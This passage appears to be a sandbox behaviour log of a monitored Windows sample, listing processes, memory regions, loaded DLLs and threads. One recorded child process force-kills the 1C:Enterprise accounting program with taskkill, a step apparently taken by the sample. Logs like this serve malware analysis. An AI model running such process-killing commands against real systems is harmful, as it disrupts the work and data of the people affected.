cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 544 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 545 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 546 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 547 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 548 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 549 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 550 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 551 start_va = 0x7ff642880000 end_va = 0x7ff642890fff monitored = 0 entry_point = 0x7ff6428816b0 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 552 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 553 start_va = 0x5a0000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 554 start_va = 0x7ff87ce40000 end_va = 0x7ff87d027fff monitored = 0 entry_point = 0x7ff87ce6ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 555 start_va = 0x7ff87f640000 end_va = 0x7ff87f6ecfff monitored = 0 entry_point = 0x7ff87f6581a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 556 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 557 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 558 start_va = 0x90000 end_va = 0x14dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 559 start_va = 0x7ff87fde0000 end_va = 0x7ff87fe7cfff monitored = 0 entry_point = 0x7ff87fde78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 560 start_va = 0x150000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 561 start_va = 0x400000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 575 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 576 start_va = 0x7ff8746c0000 end_va = 0x7ff874718fff monitored = 0 entry_point = 0x7ff8746cfbf0 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 577 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 578 start_va = 0x7ff87f6f0000 end_va = 0x7ff87f96cfff monitored = 0 entry_point = 0x7ff87f7c4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 579 start_va = 0x7ff87fe80000 end_va = 0x7ff87ff9bfff monitored = 0 entry_point = 0x7ff87fec02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 580 start_va = 0x7ff87d030000 end_va = 0x7ff87d099fff monitored = 0 entry_point = 0x7ff87d066d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 581 start_va = 0x7ff87ed60000 end_va = 0x7ff87eeb5fff monitored = 0 entry_point = 0x7ff87ed6a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 582 start_va = 0x7ff87f3e0000 end_va = 0x7ff87f565fff monitored = 0 entry_point = 0x7ff87f42ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 583 start_va = 0x1a0000 end_va = 0x1a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 584 start_va = 0x7ff87d3a0000 end_va = 0x7ff87d4e2fff monitored = 0 entry_point = 0x7ff87d3c8210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 585 start_va = 0x7ff87f970000 end_va = 0x7ff87f9cafff monitored = 0 entry_point = 0x7ff87f9838b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 586 start_va = 0x7ff87d4f0000 end_va = 0x7ff87d52afff monitored = 0 entry_point = 0x7ff87d4f12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 587 start_va = 0x7ff87fa80000 end_va = 0x7ff87fb40fff monitored = 0 entry_point = 0x7ff87faa0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 588 start_va = 0x7ff87ab10000 end_va = 0x7ff87ac95fff monitored = 0 entry_point = 0x7ff87ab5d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 595 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 596 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 597 start_va = 0x6a0000 end_va = 0x827fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006a0000" filename = "" Region: id = 598 start_va = 0x830000 end_va = 0x9b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000830000" filename = "" Region: id = 599 start_va = 0x9c0000 end_va = 0x1dbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009c0000" filename = "" Region: id = 600 start_va = 0x1dc0000 end_va = 0x1fbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001dc0000" filename = "" Region: id = 623 start_va = 0x400000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 624 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 625 start_va = 0x7ff87d650000 end_va = 0x7ff87ebaefff monitored = 0 entry_point = 0x7ff87d7b11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 626 start_va = 0x7ff87c710000 end_va = 0x7ff87c752fff monitored = 0 entry_point = 0x7ff87c724b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 627 start_va = 0x7ff87c760000 end_va = 0x7ff87cda3fff monitored = 0 entry_point = 0x7ff87c9264b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 628 start_va = 0x7ff87fd30000 end_va = 0x7ff87fdd6fff monitored = 0 entry_point = 0x7ff87fd458d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 629 start_va = 0x7ff87fb50000 end_va = 0x7ff87fba1fff monitored = 0 entry_point = 0x7ff87fb5f530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 630 start_va = 0x7ff87c640000 end_va = 0x7ff87c64efff monitored = 0 entry_point = 0x7ff87c643210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 631 start_va = 0x7ff87c650000 end_va = 0x7ff87c704fff monitored = 0 entry_point = 0x7ff87c6922e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 632 start_va = 0x7ff87c5f0000 end_va = 0x7ff87c63afff monitored = 0 entry_point = 0x7ff87c5f35f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 633 start_va = 0x7ff87c5d0000 end_va = 0x7ff87c5e3fff monitored = 0 entry_point = 0x7ff87c5d52e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 654 start_va = 0x7ff87af40000 end_va = 0x7ff87afd5fff monitored = 0 entry_point = 0x7ff87af65570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 655 start_va = 0x1dc0000 end_va = 0x1f1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001dc0000" filename = "" Region: id = 656 start_va = 0x1fb0000 end_va = 0x1fbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fb0000" filename = "" Region: id = 711 start_va = 0x1fc0000 end_va = 0x22f6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 712 start_va = 0x2300000 end_va = 0x251ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002300000" filename = "" Region: id = 713 start_va = 0x2520000 end_va = 0x2730fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002520000" filename = "" Region: id = 714 start_va = 0x440000 end_va = 0x54dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 736 start_va = 0x2740000 end_va = 0x2950fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002740000" filename = "" Region: id = 737 start_va = 0x1dc0000 end_va = 0x1ed0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001dc0000" filename = "" Region: id = 738 start_va = 0x1f10000 end_va = 0x1f1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f10000" filename = "" Region: id = 754 start_va = 0x560000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 755 start_va = 0x7ff87fbb0000 end_va = 0x7ff87fd09fff monitored = 0 entry_point = 0x7ff87fbf38e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 756 start_va = 0x50000 end_va = 0x50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 757 start_va = 0x2960000 end_va = 0x2a1bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002960000" filename = "" Region: id = 758 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 759 start_va = 0x7ff87a590000 end_va = 0x7ff87a5b1fff monitored = 0 entry_point = 0x7ff87a591a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 760 start_va = 0x7ff87ad00000 end_va = 0x7ff87ad12fff monitored = 0 entry_point = 0x7ff87ad02760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 761 start_va = 0x7ff87c3d0000 end_va = 0x7ff87c425fff monitored = 0 entry_point = 0x7ff87c3e0bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 980 start_va = 0x60000 end_va = 0x66fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 981 start_va = 0x70000 end_va = 0x70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 982 start_va = 0x80000 end_va = 0x80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 983 start_va = 0x1d0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 984 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 985 start_va = 0x1f0000 end_va = 0x1f4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 986 start_va = 0x1ee0000 end_va = 0x1ee0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 987 start_va = 0x1ef0000 end_va = 0x1ef1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ef0000" filename = "" Region: id = 988 start_va = 0x7ff872050000 end_va = 0x7ff8722c3fff monitored = 0 entry_point = 0x7ff8720c0400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 989 start_va = 0x1f00000 end_va = 0x1f00fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 990 start_va = 0x1f20000 end_va = 0x1f21fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f20000" filename = "" Thread: id = 16 os_tid = 0x1124 Thread: id = 19 os_tid = 0x700 Thread: id = 21 os_tid = 0xd38 Thread: id = 28 os_tid = 0x13e8 Process: id = "8" image_name = "taskkill.exe" filename = "c:\\windows\\system32\\taskkill.exe" page_root = "0x4a207000" os_pid = "0x1104" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xe44" cmd_line = "\"C:\\Windows\\System32\\taskkill.exe\" /f /im 1cv8.exe" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 532 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 533 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 534 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 535 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 536 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 537 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 538 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 539 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 540 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 541 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 542 start_va = 0x7ff74fa80000 end_va = 0x7ff74fa9bfff monitored = 0 entry_point = 0x7ff74fa8fc00 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\System32\\taskkill.exe" (normalized: "c:\\windows\\system32\\taskkill.exe") Region: id = 543 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 668 start_va = 0x5f0000 end_va = 0x6effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 669 start_va = 0x7ff87ce40000 end_va = 0x7ff87d027fff monitored = 0 entry_point = 0x7ff87ce6ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 670 start_va = 0x7ff87f640000 end_va = 0x7ff87f6ecfff monitored = 0 entry_point = 0x7ff87f6581a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 671 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 672 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 673 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1155 start_va = 0x7ff87fd30000 end_va = 0x7ff87fdd6fff monitored = 0 entry_point = 0x7ff87fd458d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1156 start_va = 0x7ff87fde0000 end_va = 0x7ff87fe7cfff monitored = 0 entry_point = 0x7ff87fde78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1157 start_va = 0x400000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1158 start_va = 0x7ff87f970000 end_va = 0x7ff87f9cafff monitored = 0 entry_point = 0x7ff87f9838b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1159 start_va = 0x7ff87fe80000 end_va = 0x7ff87ff9bfff monitored = 0 entry_point = 0x7ff87fec02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1160 start_va = 0x7ff87ed60000 end_va = 0x7ff87eeb5fff monitored = 0 entry_point = 0x7ff87ed6a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1161 start_va = 0x7ff87f3e0000 end_va = 0x7ff87f565fff monitored = 0 entry_point = 0x7ff87f42ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1162 start_va = 0x7ff87fa80000 end_va = 0x7ff87fb40fff monitored = 0 entry_point = 0x7ff87faa0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1163 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1164 start_va = 0x7ff87f6f0000 end_va = 0x7ff87f96cfff monitored = 0 entry_point = 0x7ff87f7c4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1165 start_va = 0x7ff87d030000 end_va = 0x7ff87d099fff monitored = 0 entry_point = 0x7ff87d066d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1166 start_va = 0x7ff87eed0000 end_va = 0x7ff87ef3afff monitored = 0 entry_point = 0x7ff87eee90c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1167 start_va = 0x7ff87fb50000 end_va = 0x7ff87fba1fff monitored = 0 entry_point = 0x7ff87fb5f530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1168 start_va = 0x7ff870d80000 end_va = 0x7ff870d89fff monitored = 0 entry_point = 0x7ff870d81350 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 1202 start_va = 0x7ff86f000000 end_va = 0x7ff86f04dfff monitored = 0 entry_point = 0x7ff86f011ce0 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 1203 start_va = 0x7ff874540000 end_va = 0x7ff87455afff monitored = 0 entry_point = 0x7ff874541040 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 1204 start_va = 0x7ff87c240000 end_va = 0x7ff87c26cfff monitored = 0 entry_point = 0x7ff87c259d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1205 start_va = 0x7ff86d070000 end_va = 0x7ff86d095fff monitored = 0 entry_point = 0x7ff86d071cf0 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 1206 start_va = 0x7ff87b9d0000 end_va = 0x7ff87b9dbfff monitored = 0 entry_point = 0x7ff87b9d27e0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1223 start_va = 0x480000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 1224 start_va = 0x500000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 1225 start_va = 0x7ff864390000 end_va = 0x7ff86451bfff monitored = 0 entry_point = 0x7ff864398de0 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll") Region: id = 1226 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1227 start_va = 0x500000 end_va = 0x538fff monitored = 0 entry_point = 0x5012f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1228 start_va = 0x560000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 1229 start_va = 0x6f0000 end_va = 0x877fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006f0000" filename = "" Region: id = 1230 start_va = 0x7ff87d4f0000 end_va = 0x7ff87d52afff monitored = 0 entry_point = 0x7ff87d4f12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1233 start_va = 0x880000 end_va = 0xa00fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000880000" filename = "" Region: id = 1234 start_va = 0xa10000 end_va = 0x1e0ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a10000" filename = "" Region: id = 1235 start_va = 0x1d0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 1236 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 1237 start_va = 0x1f0000 end_va = 0x1f4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\System32\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskkill.exe.mui") Region: id = 1262 start_va = 0x500000 end_va = 0x500fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 1263 start_va = 0x510000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 1264 start_va = 0x1e10000 end_va = 0x2146fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1265 start_va = 0x2150000 end_va = 0x2292fff monitored = 0 entry_point = 0x2178210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1297 start_va = 0x2150000 end_va = 0x222ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 1298 start_va = 0x2230000 end_va = 0x230cfff monitored = 